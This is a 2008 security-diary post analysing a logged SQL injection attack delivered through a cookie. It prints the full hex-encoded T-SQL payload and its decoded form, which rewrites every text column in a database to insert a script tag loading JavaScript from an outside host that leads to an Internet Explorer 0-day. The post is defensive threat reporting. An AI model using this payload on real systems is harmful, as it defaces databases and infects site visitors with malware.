MSIE 0-day Spreading Via SQL Injection

Published: 2008-12-12
Last Updated: 2008-12-12 01:00:18 UTC
by Johannes Ullrich (Version: 1)
0 comment(s)

One of our readers submitted this log entry, which shows a typical SQL injection exploit. The "new" part is that the javascript injected in this case is trying to exploit the MSIE 0-day:

In this case, the SQL injection is delivered as a cookie, not a GET parameter.

I broke up the strings for readability and inserted spaces around the malicious URL. As usual with these kinds of exploit, the script will load another script which will load another script ultimatley leading to the IE exploit.

 

Cookie: ref=ef';DECLA RE @S VARCHAR(4000);SET @S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263
6861722832353529204445434C415245205461626C655F437572736F7220435552534F52
20464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F62
6A6563747320612C737973636F6C756D6E7306220776865726520612E69643D622E69642
0616E6420612E78747970653D27752720616E642028622E78747970653D3939206F72206
22E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653
D31363729204F50454E205461626C655F437572736F72204645544348204E45585420465
24F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404
046455443485F5354415455533D302920424547494E20657865632827757064617465205
B272B40542B275D20736574205B272B40432B275D3D727472696D28636F6E76657274287
66172636861722834303030292C5B272B40432B275D29292B27273C73637269707420737

2633D687474703A2F2F313767616D6F2E636F6D2F312E6A733E3C2F7363726970743E272
727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544
F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4
F43415445205461626C655F437572736F72 AS VARCHAR(4000));exec (@S);--


Decoded as:
DECLARE @T varchar(255),@C varchar(255)
DECLARE Table_Cursor CURSOR FOR
  select a.name,b.name from sysobjects a,syscolumns b
  where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or
                      b.xtype=231 or b.xtype=167)

OPEN Table_Cursor FETCH NEXT FROM  Table_Cursor INTO @T,@C
  WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+']
   set ['+@C+']=rtrim(convert(varchar(4000),['+@C+']))+
       ''<script src=http:// 17gamo . com/1.js></script>''')
FETCH NEXT FROM  Table_Cursor INTO @T,@C END
CLOSE Table_Cursor DEALLOCATE Table_Cursor

 

------
Johannes B. Ullrich, Ph.D.
SANS Technology Institute

0 comment(s)

Comments


Diary Archives